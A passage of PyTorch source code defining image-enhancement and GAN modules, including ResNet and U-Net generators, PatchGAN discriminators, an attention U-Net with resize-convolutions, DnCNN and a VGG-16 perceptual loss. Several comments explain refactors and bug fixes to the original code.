    images of the same spatial size and squashes the output with Tanh.
    """

    def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d,
                 use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect'):
        assert (n_blocks >= 0)
        super(ResnetGenerator, self).__init__()
        self.input_nc = input_nc
        self.output_nc = output_nc
        self.ngf = ngf
        self.gpu_ids = gpu_ids

        # Stem: 7x7 conv on a reflection-padded input (padding=0 because the
        # ReflectionPad2d(3) already supplies the 3-pixel border).
        layers = [nn.ReflectionPad2d(3),
                  nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0),
                  norm_layer(ngf),
                  nn.ReLU(True)]

        # Two stride-2 downsampling stages, doubling the width each time.
        n_downsampling = 2
        for stage in range(n_downsampling):
            width = ngf * (2 ** stage)
            layers += [nn.Conv2d(width, width * 2, kernel_size=3, stride=2, padding=1),
                       norm_layer(width * 2),
                       nn.ReLU(True)]

        # Residual bottleneck at the widest resolution.
        bottleneck = ngf * (2 ** n_downsampling)
        layers += [ResnetBlock(bottleneck, padding_type=padding_type,
                               norm_layer=norm_layer, use_dropout=use_dropout)
                   for _ in range(n_blocks)]

        # Mirrored upsampling stages, halving the width each time.
        for stage in range(n_downsampling):
            width = ngf * (2 ** (n_downsampling - stage))
            layers += [nn.ConvTranspose2d(width, width // 2, kernel_size=3,
                                          stride=2, padding=1, output_padding=1),
                       norm_layer(width // 2),
                       nn.ReLU(True)]

        # Head: 7x7 conv back to the requested channel count, Tanh range [-1, 1].
        layers += [nn.ReflectionPad2d(3),
                   nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0),
                   nn.Tanh()]

        self.model = nn.Sequential(*layers)

    def forward(self, input):
        # Spread the batch across GPUs only for CUDA inputs with gpu_ids set.
        if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor):
            return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
        return self.model(input)


class ResnetBlock(nn.Module):
    """A single residual block: (pad, 3x3 conv, norm, ReLU, [dropout], pad, 3x3 conv, norm)
    with an identity shortcut around it."""

    def __init__(self, dim, padding_type, norm_layer, use_dropout):
        super(ResnetBlock, self).__init__()
        self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout)

    def build_conv_block(self, dim, padding_type, norm_layer, use_dropout):
        def pad_layers():
            # Returns (explicit padding layers, conv padding) for the chosen mode.
            if padding_type == 'reflect':
                return [nn.ReflectionPad2d(1)], 0
            if padding_type == 'replicate':
                return [nn.ReplicationPad2d(1)], 0
            if padding_type == 'zero':
                return [], 1
            raise NotImplementedError('padding [%s] is not implemented' % padding_type)

        pad, p = pad_layers()
        block = pad + [nn.Conv2d(dim, dim, kernel_size=3, padding=p),
                       norm_layer(dim),
                       nn.ReLU(True)]
        if use_dropout:
            block += [nn.Dropout(0.5)]
        pad, p = pad_layers()
        block += pad + [nn.Conv2d(dim, dim, kernel_size=3, padding=p),
                        norm_layer(dim)]
        return nn.Sequential(*block)

    def forward(self, x):
        # Identity shortcut around the two-conv body.
        return x + self.conv_block(x)
# U-Net generator. |num_downs| is the number of downsamplings; e.g. with
# num_downs == 7 a 128x128 image shrinks to 1x1 at the bottleneck.
class UnetGenerator(nn.Module):
    """U-Net built recursively from UnetSkipConnectionBlock, innermost first.

    Requires input_nc == output_nc. When ``skip`` is true the whole U-Net is
    wrapped in a SkipModule that adds ``opt.skip * input`` to the output.
    """

    def __init__(self, input_nc, output_nc, num_downs, ngf=64,
                 norm_layer=nn.BatchNorm2d, use_dropout=False, gpu_ids=[],
                 skip=False, opt=None):
        super(UnetGenerator, self).__init__()
        self.gpu_ids = gpu_ids
        self.opt = opt
        # currently support only input_nc == output_nc
        assert (input_nc == output_nc)

        # Bottleneck block first, then wrap outward.
        block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, norm_layer=norm_layer,
                                        innermost=True, opt=opt)
        # Extra ngf*8 <-> ngf*8 stages so total depth reaches num_downs.
        for _ in range(num_downs - 5):
            block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, block,
                                            norm_layer=norm_layer,
                                            use_dropout=use_dropout, opt=opt)
        # Widening stages back toward the image resolution.
        for outer in (ngf * 4, ngf * 2, ngf):
            block = UnetSkipConnectionBlock(outer, outer * 2, block,
                                            norm_layer=norm_layer, opt=opt)
        block = UnetSkipConnectionBlock(output_nc, ngf, block, outermost=True,
                                        norm_layer=norm_layer, opt=opt)

        self.model = SkipModule(block, opt) if skip == True else block

    def forward(self, input):
        if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor):
            return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
        return self.model(input)


class SkipModule(nn.Module):
    """Adds a scaled global residual (opt.skip * x) around ``submodule`` and
    also returns the raw submodule output as the latent."""

    def __init__(self, submodule, opt):
        super(SkipModule, self).__init__()
        self.submodule = submodule
        self.opt = opt

    def forward(self, x):
        latent = self.submodule(x)
        return self.opt.skip * x + latent, latent
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
#   |-- downsampling -- |submodule| -- upsampling --|
class UnetSkipConnectionBlock(nn.Module):
    """One U-Net level: stride-2 conv down, ``submodule`` in the middle,
    transposed conv up, with the input concatenated onto the output
    (except at the outermost level, which returns the model output alone).

    ``downconv`` maps outer_nc -> inner_nc; the up path maps back to outer_nc.
    Normalization layers are inserted only when ``opt.use_norm`` is nonzero
    (the original code special-cased 0 vs 1 with two duplicated branches;
    any other value previously fell through to dead code).
    """

    def __init__(self, outer_nc, inner_nc,
                 submodule=None, outermost=False, innermost=False,
                 norm_layer=nn.BatchNorm2d, use_dropout=False, opt=None):
        super(UnetSkipConnectionBlock, self).__init__()
        self.outermost = outermost
        use_norm = opt.use_norm != 0

        downconv = nn.Conv2d(outer_nc, inner_nc, kernel_size=4,
                             stride=2, padding=1)
        downrelu = nn.LeakyReLU(0.2, True)
        uprelu = nn.ReLU(True)

        if outermost:
            # Outermost level: no norm in either configuration, Tanh output.
            upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
                                        kernel_size=4, stride=2, padding=1)
            down = [downconv]
            up = [uprelu, upconv, nn.Tanh()]
            model = down + [submodule] + up
        elif innermost:
            # Bottleneck: no submodule; up path takes inner_nc (no concat yet).
            upconv = nn.ConvTranspose2d(inner_nc, outer_nc,
                                        kernel_size=4, stride=2, padding=1)
            down = [downrelu, downconv]
            up = [uprelu, upconv] + ([norm_layer(outer_nc)] if use_norm else [])
            model = down + up
        else:
            # Middle level: concat doubles the up path's input channels.
            upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
                                        kernel_size=4, stride=2, padding=1)
            down = [downrelu, downconv] + ([norm_layer(inner_nc)] if use_norm else [])
            up = [uprelu, upconv] + ([norm_layer(outer_nc)] if use_norm else [])
            if use_dropout:
                model = down + [submodule] + up + [nn.Dropout(0.5)]
            else:
                model = down + [submodule] + up

        self.model = nn.Sequential(*model)

    def forward(self, x):
        if self.outermost:
            return self.model(x)
        else:
            # Skip connection: concatenate the level's input onto its output.
            return torch.cat([self.model(x), x], 1)
# Defines the PatchGAN discriminator with the specified arguments.
class NLayerDiscriminator(nn.Module):
    """PatchGAN discriminator: a stack of stride-2 convs (with normalization)
    ending in a 1-channel map of per-patch real/fake scores."""

    def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d,
                 use_sigmoid=False, gpu_ids=[]):
        super(NLayerDiscriminator, self).__init__()
        self.gpu_ids = gpu_ids
        kw = 4
        # ceil((kw-1)/2) == 2 for kw == 4 (slightly over-pads; kept for
        # checkpoint compatibility with the original architecture).
        padw = int(np.ceil((kw - 1) / 2))

        sequence = [
            nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),
            nn.LeakyReLU(0.2, True)
        ]

        # Channel width doubles each layer, capped at 8 * ndf.
        nf_mult = 1
        nf_mult_prev = 1
        for n in range(1, n_layers):
            nf_mult_prev = nf_mult
            nf_mult = min(2 ** n, 8)
            sequence += [
                nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
                          kernel_size=kw, stride=2, padding=padw),
                norm_layer(ndf * nf_mult),
                nn.LeakyReLU(0.2, True)
            ]

        # One extra stride-1 conv before the 1-channel prediction head.
        nf_mult_prev = nf_mult
        nf_mult = min(2 ** n_layers, 8)
        sequence += [
            nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
                      kernel_size=kw, stride=1, padding=padw),
            norm_layer(ndf * nf_mult),
            nn.LeakyReLU(0.2, True)
        ]
        sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]

        if use_sigmoid:
            sequence += [nn.Sigmoid()]

        self.model = nn.Sequential(*sequence)

    def forward(self, input):
        return self.model(input)


class NoNormDiscriminator(nn.Module):
    """Same topology as NLayerDiscriminator but without any normalization
    layers (e.g. for WGAN-GP, where batch norm in D is undesirable)."""

    def __init__(self, input_nc, ndf=64, n_layers=3, use_sigmoid=False, gpu_ids=[]):
        super(NoNormDiscriminator, self).__init__()
        self.gpu_ids = gpu_ids
        kw = 4
        padw = int(np.ceil((kw - 1) / 2))

        sequence = [
            nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),
            nn.LeakyReLU(0.2, True)
        ]
        nf_mult = 1
        nf_mult_prev = 1
        for n in range(1, n_layers):
            nf_mult_prev = nf_mult
            nf_mult = min(2 ** n, 8)
            sequence += [
                nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
                          kernel_size=kw, stride=2, padding=padw),
                nn.LeakyReLU(0.2, True)
            ]
        nf_mult_prev = nf_mult
        nf_mult = min(2 ** n_layers, 8)
        sequence += [
            nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
                      kernel_size=kw, stride=1, padding=padw),
            nn.LeakyReLU(0.2, True)
        ]
        sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]
        if use_sigmoid:
            sequence += [nn.Sigmoid()]

        self.model = nn.Sequential(*sequence)

    def forward(self, input):
        return self.model(input)


class FCDiscriminator(nn.Module):
    """Discriminator ending in a fully connected head: the conv trunk's
    per-patch map is flattened and reduced to a single scalar per sample.

    The linear layer's input size is hard-wired to the trunk's output
    resolution: 7x7 when ``patch`` is set, 13x13 otherwise, so the input
    image size must match the trained configuration.
    """

    def __init__(self, input_nc, ndf=64, n_layers=3, use_sigmoid=False,
                 gpu_ids=[], patch=False):
        super(FCDiscriminator, self).__init__()
        self.gpu_ids = gpu_ids
        self.use_sigmoid = use_sigmoid
        kw = 4
        padw = int(np.ceil((kw - 1) / 2))

        sequence = [
            nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),
            nn.LeakyReLU(0.2, True)
        ]
        nf_mult = 1
        nf_mult_prev = 1
        for n in range(1, n_layers):
            nf_mult_prev = nf_mult
            nf_mult = min(2 ** n, 8)
            sequence += [
                nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
                          kernel_size=kw, stride=2, padding=padw),
                nn.LeakyReLU(0.2, True)
            ]
        nf_mult_prev = nf_mult
        nf_mult = min(2 ** n_layers, 8)
        sequence += [
            nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
                      kernel_size=kw, stride=1, padding=padw),
            nn.LeakyReLU(0.2, True)
        ]
        sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]

        if patch:
            self.linear = nn.Linear(7 * 7, 1)
        else:
            self.linear = nn.Linear(13 * 13, 1)
        if use_sigmoid:
            self.sigmoid = nn.Sigmoid()

        self.model = nn.Sequential(*sequence)

    def forward(self, input):
        batchsize = input.size()[0]
        output = self.model(input)
        output = output.view(batchsize, -1)
        output = self.linear(output)
        if self.use_sigmoid:
            # NOTE: the original forward contained a stray debug
            # print("sigmoid") here; removed.
            output = self.sigmoid(output)
        return output
class Unet_resize_conv(nn.Module):
    """U-Net enhancer with optional attention (``opt.self_attention``), optional
    batch norm (``opt.use_norm == 1``) and a scaled global residual (``skip``).

    Upsampling uses bilinear resize followed by 3x3 convs (resize-conv) instead
    of transposed convolutions. The original implementation duplicated the whole
    network body for the normed / un-normed cases; this version keeps the exact
    attribute names (state_dict compatible) and runs a single code path, applying
    the bn layers only when ``opt.use_norm == 1``. Values of ``use_norm`` other
    than 1 behave like the un-normed path (previously they hit dead code).
    """

    def __init__(self, opt, skip):
        super(Unet_resize_conv, self).__init__()
        self.opt = opt
        self.skip = skip
        p = 1

        def norm(ch):
            # SynBN2d (synchronized BN) comes from a file-level import.
            return SynBN2d(ch) if opt.syn_norm else nn.BatchNorm2d(ch)

        def pool():
            return nn.AvgPool2d(2) if opt.use_avgpool == 1 else nn.MaxPool2d(2)

        use_bn = opt.use_norm == 1

        if opt.self_attention:
            # 4th input channel carries the attention (gray) map, which is also
            # downsampled alongside the encoder feature maps.
            self.conv1_1 = nn.Conv2d(4, 32, 3, padding=p)
            self.downsample_1 = nn.MaxPool2d(2)
            self.downsample_2 = nn.MaxPool2d(2)
            self.downsample_3 = nn.MaxPool2d(2)
            self.downsample_4 = nn.MaxPool2d(2)
        else:
            self.conv1_1 = nn.Conv2d(3, 32, 3, padding=p)
        self.LReLU1_1 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn1_1 = norm(32)
        self.conv1_2 = nn.Conv2d(32, 32, 3, padding=p)
        self.LReLU1_2 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn1_2 = norm(32)
        self.max_pool1 = pool()

        self.conv2_1 = nn.Conv2d(32, 64, 3, padding=p)
        self.LReLU2_1 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn2_1 = norm(64)
        self.conv2_2 = nn.Conv2d(64, 64, 3, padding=p)
        self.LReLU2_2 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn2_2 = norm(64)
        self.max_pool2 = pool()

        self.conv3_1 = nn.Conv2d(64, 128, 3, padding=p)
        self.LReLU3_1 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn3_1 = norm(128)
        self.conv3_2 = nn.Conv2d(128, 128, 3, padding=p)
        self.LReLU3_2 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn3_2 = norm(128)
        self.max_pool3 = pool()

        self.conv4_1 = nn.Conv2d(128, 256, 3, padding=p)
        self.LReLU4_1 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn4_1 = norm(256)
        self.conv4_2 = nn.Conv2d(256, 256, 3, padding=p)
        self.LReLU4_2 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn4_2 = norm(256)
        self.max_pool4 = pool()

        self.conv5_1 = nn.Conv2d(256, 512, 3, padding=p)
        self.LReLU5_1 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn5_1 = norm(512)
        self.conv5_2 = nn.Conv2d(512, 512, 3, padding=p)
        self.LReLU5_2 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn5_2 = norm(512)

        # Decoder: each ``deconvN`` is a 3x3 conv applied after bilinear resize.
        self.deconv5 = nn.Conv2d(512, 256, 3, padding=p)
        self.conv6_1 = nn.Conv2d(512, 256, 3, padding=p)
        self.LReLU6_1 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn6_1 = norm(256)
        self.conv6_2 = nn.Conv2d(256, 256, 3, padding=p)
        self.LReLU6_2 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn6_2 = norm(256)

        self.deconv6 = nn.Conv2d(256, 128, 3, padding=p)
        self.conv7_1 = nn.Conv2d(256, 128, 3, padding=p)
        self.LReLU7_1 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn7_1 = norm(128)
        self.conv7_2 = nn.Conv2d(128, 128, 3, padding=p)
        self.LReLU7_2 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn7_2 = norm(128)

        self.deconv7 = nn.Conv2d(128, 64, 3, padding=p)
        self.conv8_1 = nn.Conv2d(128, 64, 3, padding=p)
        self.LReLU8_1 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn8_1 = norm(64)
        self.conv8_2 = nn.Conv2d(64, 64, 3, padding=p)
        self.LReLU8_2 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn8_2 = norm(64)

        self.deconv8 = nn.Conv2d(64, 32, 3, padding=p)
        self.conv9_1 = nn.Conv2d(64, 32, 3, padding=p)
        self.LReLU9_1 = nn.LeakyReLU(0.2, inplace=True)
        if use_bn:
            self.bn9_1 = norm(32)
        # Stage 9 has no second norm layer in either configuration.
        self.conv9_2 = nn.Conv2d(32, 32, 3, padding=p)
        self.LReLU9_2 = nn.LeakyReLU(0.2, inplace=True)

        self.conv10 = nn.Conv2d(32, 3, 1)
        if opt.tanh:
            self.tanh = nn.Tanh()

    def depth_to_space(self, input, block_size):
        # Pixel-shuffle style rearrangement; kept for compatibility.
        # NOTE(review): uses the long-deprecated Tensor.resize on permuted
        # tensors — only safe on the legacy torch version this was written for.
        block_size_sq = block_size * block_size
        output = input.permute(0, 2, 3, 1)
        (batch_size, d_height, d_width, d_depth) = output.size()
        s_depth = int(d_depth / block_size_sq)
        s_width = int(d_width * block_size)
        s_height = int(d_height * block_size)
        t_1 = output.resize(batch_size, d_height, d_width, block_size_sq, s_depth)
        spl = t_1.split(block_size, 3)
        stack = [t_t.resize(batch_size, d_height, s_width, s_depth) for t_t in spl]
        output = torch.stack(stack, 0).transpose(0, 1).permute(0, 2, 1, 3, 4).resize(batch_size, s_height, s_width, s_depth)
        output = output.permute(0, 3, 1, 2)
        return output

    def forward(self, input, gray):
        flag = 0
        if input.size()[3] > 2200:
            # Very wide inputs are halved first and upsampled back at the end.
            avg = nn.AvgPool2d(2)
            input = avg(input)
            gray = avg(gray)
            flag = 1
        # pad_tensor / pad_tensor_back are file-level helpers that pad to a
        # size divisible by 16 and crop back afterwards.
        input, pad_left, pad_right, pad_top, pad_bottom = pad_tensor(input)
        gray, pad_left, pad_right, pad_top, pad_bottom = pad_tensor(gray)

        att = self.opt.self_attention
        if att:
            gray_2 = self.downsample_1(gray)
            gray_3 = self.downsample_2(gray_2)
            gray_4 = self.downsample_3(gray_3)
            gray_5 = self.downsample_4(gray_4)

        use_bn = self.opt.use_norm == 1

        def step(x, conv, act, bn_name):
            # conv -> LeakyReLU -> (optional) batch norm, as in the original.
            y = act(conv(x))
            return getattr(self, bn_name)(y) if use_bn else y

        x = step(torch.cat((input, gray), 1) if att else input,
                 self.conv1_1, self.LReLU1_1, 'bn1_1')
        conv1 = step(x, self.conv1_2, self.LReLU1_2, 'bn1_2')
        x = self.max_pool1(conv1)

        x = step(x, self.conv2_1, self.LReLU2_1, 'bn2_1')
        conv2 = step(x, self.conv2_2, self.LReLU2_2, 'bn2_2')
        x = self.max_pool2(conv2)

        x = step(x, self.conv3_1, self.LReLU3_1, 'bn3_1')
        conv3 = step(x, self.conv3_2, self.LReLU3_2, 'bn3_2')
        x = self.max_pool3(conv3)

        x = step(x, self.conv4_1, self.LReLU4_1, 'bn4_1')
        conv4 = step(x, self.conv4_2, self.LReLU4_2, 'bn4_2')
        x = self.max_pool4(conv4)

        x = step(x, self.conv5_1, self.LReLU5_1, 'bn5_1')
        x = x * gray_5 if att else x
        conv5 = step(x, self.conv5_2, self.LReLU5_2, 'bn5_2')

        conv5 = F.upsample(conv5, scale_factor=2, mode='bilinear')
        conv4 = conv4 * gray_4 if att else conv4
        up6 = torch.cat([self.deconv5(conv5), conv4], 1)
        x = step(up6, self.conv6_1, self.LReLU6_1, 'bn6_1')
        conv6 = step(x, self.conv6_2, self.LReLU6_2, 'bn6_2')

        conv6 = F.upsample(conv6, scale_factor=2, mode='bilinear')
        conv3 = conv3 * gray_3 if att else conv3
        up7 = torch.cat([self.deconv6(conv6), conv3], 1)
        x = step(up7, self.conv7_1, self.LReLU7_1, 'bn7_1')
        conv7 = step(x, self.conv7_2, self.LReLU7_2, 'bn7_2')

        conv7 = F.upsample(conv7, scale_factor=2, mode='bilinear')
        conv2 = conv2 * gray_2 if att else conv2
        up8 = torch.cat([self.deconv7(conv7), conv2], 1)
        x = step(up8, self.conv8_1, self.LReLU8_1, 'bn8_1')
        conv8 = step(x, self.conv8_2, self.LReLU8_2, 'bn8_2')

        conv8 = F.upsample(conv8, scale_factor=2, mode='bilinear')
        conv1 = conv1 * gray if att else conv1
        up9 = torch.cat([self.deconv8(conv8), conv1], 1)
        x = step(up9, self.conv9_1, self.LReLU9_1, 'bn9_1')
        conv9 = self.LReLU9_2(self.conv9_2(x))

        latent = self.conv10(conv9)
        if self.opt.times_residual:
            latent = latent * gray
        if self.opt.tanh:
            latent = self.tanh(latent)

        if self.skip:
            if self.opt.linear_add:
                if self.opt.latent_threshold:
                    latent = F.relu(latent)
                elif self.opt.latent_norm:
                    latent = (latent - torch.min(latent)) / (torch.max(latent) - torch.min(latent))
                input = (input - torch.min(input)) / (torch.max(input) - torch.min(input))
                output = latent + input * self.opt.skip
                output = output * 2 - 1
            else:
                if self.opt.latent_threshold:
                    latent = F.relu(latent)
                elif self.opt.latent_norm:
                    latent = (latent - torch.min(latent)) / (torch.max(latent) - torch.min(latent))
                output = latent + input * self.opt.skip
        else:
            output = latent
        if self.opt.linear:
            output = output / torch.max(torch.abs(output))

        output = pad_tensor_back(output, pad_left, pad_right, pad_top, pad_bottom)
        latent = pad_tensor_back(latent, pad_left, pad_right, pad_top, pad_bottom)
        gray = pad_tensor_back(gray, pad_left, pad_right, pad_top, pad_bottom)
        if flag == 1:
            output = F.upsample(output, scale_factor=2, mode='bilinear')
            gray = F.upsample(gray, scale_factor=2, mode='bilinear')
        if self.skip:
            return output, latent
        else:
            return output


class DnCNN(nn.Module):
    """DnCNN residual denoiser (Zhang et al.): predicts the noise and returns
    ``input + predicted_residual``."""

    def __init__(self, opt=None, depth=17, n_channels=64, image_channels=1,
                 use_bnorm=True, kernel_size=3):
        super(DnCNN, self).__init__()
        kernel_size = 3
        padding = 1
        layers = []

        layers.append(nn.Conv2d(in_channels=image_channels, out_channels=n_channels,
                                kernel_size=kernel_size, padding=padding, bias=True))
        layers.append(nn.ReLU(inplace=True))
        for _ in range(depth - 2):
            layers.append(nn.Conv2d(in_channels=n_channels, out_channels=n_channels,
                                    kernel_size=kernel_size, padding=padding, bias=False))
            layers.append(nn.BatchNorm2d(n_channels, eps=0.0001, momentum=0.95))
            layers.append(nn.ReLU(inplace=True))
        layers.append(nn.Conv2d(in_channels=n_channels, out_channels=image_channels,
                                kernel_size=kernel_size, padding=padding, bias=False))
        self.dncnn = nn.Sequential(*layers)
        self._initialize_weights()

    def forward(self, x):
        # Residual learning: the trunk predicts the noise component.
        y = x
        out = self.dncnn(x)
        return y + out

    def _initialize_weights(self):
        # Orthogonal conv weights, unit BN scale, zero biases.
        # NOTE: the original printed 'init weight' per conv layer; removed.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                init.orthogonal_(m.weight)
                if m.bias is not None:
                    init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                init.constant_(m.weight, 1)
                init.constant_(m.bias, 0)
class Vgg16(nn.Module):
    """VGG-16 feature extractor for perceptual loss.

    ``forward`` returns the activation selected by ``opt.vgg_choose``
    (e.g. "relu4_2", "conv5_3"); any unrecognized value — including
    "maxpool" — falls back to relu5_3, matching the original behavior.
    """

    def __init__(self):
        super(Vgg16, self).__init__()
        self.conv1_1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1)
        self.conv1_2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1)

        self.conv2_1 = nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1)
        self.conv2_2 = nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1)

        self.conv3_1 = nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1)
        self.conv3_2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
        self.conv3_3 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)

        self.conv4_1 = nn.Conv2d(256, 512, kernel_size=3, stride=1, padding=1)
        self.conv4_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)
        self.conv4_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)

        self.conv5_1 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)
        self.conv5_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)
        self.conv5_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)

    def forward(self, X, opt):
        h = F.relu(self.conv1_1(X), inplace=True)
        h = F.relu(self.conv1_2(h), inplace=True)
        h = F.max_pool2d(h, kernel_size=2, stride=2)

        h = F.relu(self.conv2_1(h), inplace=True)
        h = F.relu(self.conv2_2(h), inplace=True)
        h = F.max_pool2d(h, kernel_size=2, stride=2)

        h = F.relu(self.conv3_1(h), inplace=True)
        h = F.relu(self.conv3_2(h), inplace=True)
        h = F.relu(self.conv3_3(h), inplace=True)
        if opt.vgg_choose != "no_maxpool":
            h = F.max_pool2d(h, kernel_size=2, stride=2)

        h = F.relu(self.conv4_1(h), inplace=True)
        relu4_1 = h
        h = F.relu(self.conv4_2(h), inplace=True)
        relu4_2 = h
        conv4_3 = self.conv4_3(h)
        h = F.relu(conv4_3, inplace=True)
        relu4_3 = h

        if opt.vgg_choose != "no_maxpool":
            if opt.vgg_maxpooling:
                h = F.max_pool2d(h, kernel_size=2, stride=2)

        relu5_1 = F.relu(self.conv5_1(h), inplace=True)
        relu5_2 = F.relu(self.conv5_2(relu5_1), inplace=True)
        conv5_3 = self.conv5_3(relu5_2)
        h = F.relu(conv5_3, inplace=True)
        relu5_3 = h

        if opt.vgg_choose == "conv4_3":
            return conv4_3
        elif opt.vgg_choose == "relu4_2":
            return relu4_2
        elif opt.vgg_choose == "relu4_1":
            return relu4_1
        elif opt.vgg_choose == "relu4_3":
            return relu4_3
        elif opt.vgg_choose == "conv5_3":
            return conv5_3
        elif opt.vgg_choose == "relu5_1":
            return relu5_1
        elif opt.vgg_choose == "relu5_2":
            return relu5_2
        else:
            # BUG FIX (behavior preserved): the original wrote
            # `elif opt.vgg_choose == "relu5_3" or "maxpool":` — the `or
            # "maxpool"` operand is always truthy, so that arm matched every
            # remaining value. An explicit else keeps the same catch-all
            # semantics without the misleading expression.
            return relu5_3


def vgg_preprocess(batch, opt):
    """Convert a [-1, 1] RGB batch to VGG's expected BGR [0, 255] layout,
    optionally subtracting the ImageNet channel means (``opt.vgg_mean``)."""
    tensortype = type(batch.data)
    (r, g, b) = torch.chunk(batch, 3, dim=1)
    batch = torch.cat((b, g, r), dim=1)  # convert RGB to BGR
    batch = (batch + 1) * 255 * 0.5  # [-1, 1] -> [0, 255]
    if opt.vgg_mean:
        # ImageNet BGR means (Caffe convention).
        mean = tensortype(batch.data.size())
        mean[:, 0, :, :] = 103.939
        mean[:, 1, :, :] = 116.779
        mean[:, 2, :, :] = 123.680
        batch = batch.sub(Variable(mean))  # subtract mean
    return batch


class PerceptualLoss(nn.Module):
    """MSE between (optionally instance-normalized) VGG features of two images."""

    def __init__(self, opt):
        super(PerceptualLoss, self).__init__()
        self.opt = opt
        self.instancenorm = nn.InstanceNorm2d(512, affine=False)

    def compute_vgg_loss(self, vgg, img, target):
        img_vgg = vgg_preprocess(img, self.opt)
        target_vgg = vgg_preprocess(target, self.opt)
        img_fea = vgg(img_vgg, self.opt)
        target_fea = vgg(target_vgg, self.opt)
        if self.opt.no_vgg_instance:
            return torch.mean((img_fea - target_fea) ** 2)
        else:
            return torch.mean((self.instancenorm(img_fea) - self.instancenorm(target_fea)) ** 2)


def load_vgg16(model_dir, gpu_ids):
    """Load pre-converted VGG-16 weights from ``model_dir`` onto the given GPUs.

    Use the model from
    https://github.com/abhiskk/fast-neural-style/blob/master/neural_style/utils.py
    """
    if not os.path.exists(model_dir):
        # makedirs handles nested paths and racing creators.
        os.makedirs(model_dir, exist_ok=True)
    vgg = Vgg16()
    vgg.cuda(device=gpu_ids[0])
    vgg.load_state_dict(torch.load(os.path.join(model_dir, 'vgg16.weight')))
    vgg = torch.nn.DataParallel(vgg, gpu_ids)
    return vgg
class FCN32s(nn.Module):
    """FCN-32s semantic segmentation network (Long et al.), VGG-16 backbone.

    ``conv1_1`` uses padding=100 so arbitrary input sizes survive the five
    poolings; the forward pass crops the upscored map back to the input size.
    Weights are expected to come from a pretrained checkpoint (see load_fcn),
    which is why _initialize_weights zeroes the convs rather than randomizing.
    """

    def __init__(self, n_class=21):
        super(FCN32s, self).__init__()
        # conv1
        self.conv1_1 = nn.Conv2d(3, 64, 3, padding=100)
        self.relu1_1 = nn.ReLU(inplace=True)
        self.conv1_2 = nn.Conv2d(64, 64, 3, padding=1)
        self.relu1_2 = nn.ReLU(inplace=True)
        self.pool1 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/2

        # conv2
        self.conv2_1 = nn.Conv2d(64, 128, 3, padding=1)
        self.relu2_1 = nn.ReLU(inplace=True)
        self.conv2_2 = nn.Conv2d(128, 128, 3, padding=1)
        self.relu2_2 = nn.ReLU(inplace=True)
        self.pool2 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/4

        # conv3
        self.conv3_1 = nn.Conv2d(128, 256, 3, padding=1)
        self.relu3_1 = nn.ReLU(inplace=True)
        self.conv3_2 = nn.Conv2d(256, 256, 3, padding=1)
        self.relu3_2 = nn.ReLU(inplace=True)
        self.conv3_3 = nn.Conv2d(256, 256, 3, padding=1)
        self.relu3_3 = nn.ReLU(inplace=True)
